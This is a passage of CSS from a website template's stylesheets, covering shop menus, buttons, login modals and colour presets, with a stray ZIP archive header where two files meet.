}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #f0e95b;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #f0e95b;
}
.vm-flex-search .vm-search-button >i {
  color: #f6f2a1;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #f0e95b;
}
.chzn-container-active .chzn-single {
  border: 1px solid #f0e95b !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #f0e95b;
}
.vm-menu .vm-title {
  border-top: 1px solid #f4ef8a;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #f0e95b;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(240,233,91,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(240,233,91,0.85);
    stroke: #f0e95b;
  }
}
PK!8[.e@�@�flex/css/presets/preset4.cssnu&1i�.major_color_bckg-100 {
  background-color: #22a9e1;
}
.major_color_bckg-90 {
  background-color: rgba(34,169,225,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(34,169,225,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(34,169,225,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(34,169,225,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(34,169,225,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(34,169,225,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(34,169,225,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(34,169,225,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(34,169,225,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #22a9e1 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #4fbae7;
}
.major_color-lighten-20 {
  color: #7ccced;
}
.major_color-lighten-30 {
  color: #a9ddf3;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #22a9e1;
  border-bottom: 2px solid #22a9e1;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #22a9e1;
  border-bottom: 2px solid #22a9e1;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #22a9e1;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #22a9e1;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #4fbae7;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(34,169,225,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #22a9e1;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(34,169,225,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #13678a;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #22a9e1;
}
.sp-module ul.accordion-menu li.current > a {
  color: #22a9e1;
}
.nav.menu li.current > a {
  color: #22a9e1;
}
.close-offcanvas:hover {
  border: 1px solid #22a9e1;
  color: #22a9e1;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #22a9e1 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #22a9e1 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #22a9e1 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #22a9e1 none repeat scroll 0 0;
}
a {
  color: #22a9e1;
}
a:hover {
  color: #1989b7;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dd >i,
.article-info >dd >span.fa {
  color: #4fbae7;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #4fbae7;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #1c99ce;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #1989b7;
}
#offcanvas-toggler >i {
  color: #4fbae7;
}
#offcanvas-toggler >i:hover {
  color: #22a9e1;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #1ea4db;
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #1678a1;
  background-color: #1d9dd2;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #22a9e1;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(34,169,225,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(34,169,225,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #38b2e4;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #22a9e1;
  color: #22a9e1;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #1989b7;
  border: 2px solid #22a9e1 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #1989b7;
  border-bottom-color: #22a9e1;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #22a9e1;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #4fbae7;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #22a9e1;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #7ccced;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #65c3ea;
  color: #fff;
  background-color: rgba(34,169,225,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #7ccced;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #65c3ea;
  color: #fff;
  background-color: rgba(34,169,225,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #4fbae7;
}
.light >i {
  color: #92d5f0;
}
.light:hover i {
  color: #a9ddf3;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #a9ddf3;
}
.login .title i.pe,
.registration .title i.pe {
  color: #7ccced;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #7ccced;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #7ccced;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #22a9e1 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #22a9e1 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #a9ddf3;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(34,169,225,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #a9ddf3;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #22a9e1;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(34,169,225,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #22a9e1;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(34,169,225,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(34,169,225,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #38b2e4;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #1882ae;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #1882ae;
}
.sp-contact-info li a:hover {
  color: #65c3ea;
}
.sp-contact-info li i {
  color: #65c3ea;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #7ccced;
}
ol.breadcrumb li a:hover {
  color: #92d5f0;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #22a9e1;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #92d5f0;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #38b2e4;
}
.sp-module.dark ul >li >span >a:hover,
